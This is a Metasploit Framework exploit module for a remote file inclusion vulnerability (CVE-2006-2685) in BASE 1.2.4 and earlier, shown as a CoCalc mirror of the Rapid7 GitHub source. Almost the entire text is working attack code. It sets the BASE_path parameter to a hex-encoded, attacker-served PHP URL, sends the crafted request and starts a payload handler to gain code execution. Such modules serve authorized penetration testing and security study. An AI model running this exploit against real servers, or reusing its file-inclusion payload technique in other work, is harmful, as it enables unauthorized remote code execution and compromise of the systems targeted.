Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/base_qry_common.rb
19512 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::HttpClient
11
include Msf::Exploit::Remote::HttpServer::PHPInclude
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'BASE base_qry_common Remote File Include',
18
'Description' => %q{
19
This module exploits a remote file inclusion vulnerability in
20
the base_qry_common.php file in BASE 1.2.4 and earlier.
21
},
22
'Author' => [ 'MC' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'CVE', '2006-2685' ],
26
[ 'OSVDB', '49366'],
27
[ 'BID', '18298' ],
28
],
29
'Privileged' => false,
30
'Payload' => {
31
'DisableNops' => true,
32
'Compat' =>
33
{
34
'ConnectionType' => 'find',
35
},
36
'Space' => 32768,
37
},
38
'Platform' => 'php',
39
'Arch' => ARCH_PHP,
40
'Targets' => [[ 'Automatic', {}]],
41
'DisclosureDate' => '2008-06-14',
42
'DefaultTarget' => 0,
43
'Notes' => {
44
'Reliability' => UNKNOWN_RELIABILITY,
45
'Stability' => UNKNOWN_STABILITY,
46
'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
}
48
)
49
)
50
51
register_options(
52
[
53
OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
54
]
55
)
56
end
57
58
def php_exploit
59
timeout = 0.01
60
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
61
print_status("Trying uri #{uri}")
62
63
response = send_request_raw({
64
'global' => true,
65
'uri' => uri,
66
}, timeout)
67
68
if response and response.code != 200
69
print_error("Server returned non-200 status code (#{response.code})")
70
end
71
72
handler
73
end
74
end
75
76